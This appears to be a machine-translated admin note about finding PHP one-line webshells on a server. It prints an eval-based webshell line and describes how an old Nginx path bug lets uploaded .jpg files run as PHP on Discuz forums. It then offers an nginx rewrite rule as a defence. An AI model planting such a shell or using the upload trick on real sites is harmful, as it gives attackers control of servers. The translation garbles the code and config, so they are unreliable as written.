About PHP a word trojan

The server was found to be planted a lot of Trojans, but also let people wantonly use ... NND

<?php @eval ($_post[' C ');? >  

the use of the method is also very simple, the local commit file point to the commit file, the inside of the PHP code will be executed

This is the only record, PHP must be a good filter system. Be sure to handle the uploaded stuff.
nginx Upload Vulnerability and discuz vulnerability handling
Due to the early version of Nginx, at least I am in the 0.9.X version of the bug still exists, resulting in processed pictures can execute PHP code
Simply put, the PHP code is written to change the extension to a picture, such as the Xx.jpg file after the Discuz and other open-source forum upload function can be uploaded by http://xxx.com/bbs/data/xxxxxxxx/xx.jpg/1.php way to execute Xx.php inside the Code

For Discuz Forum use Nginx server can use rewrite way to prevent code execution
nginx.conf Code
 
 

  
  
 
   
Rewrite ^/bbs/data/.*\. (jsp|php) $ http://www.xxx.com/break;
 
  
 
 

other issues, such as source and other folders, are also problematic, and a simple way to prevent PHP from running

About PHP a word trojan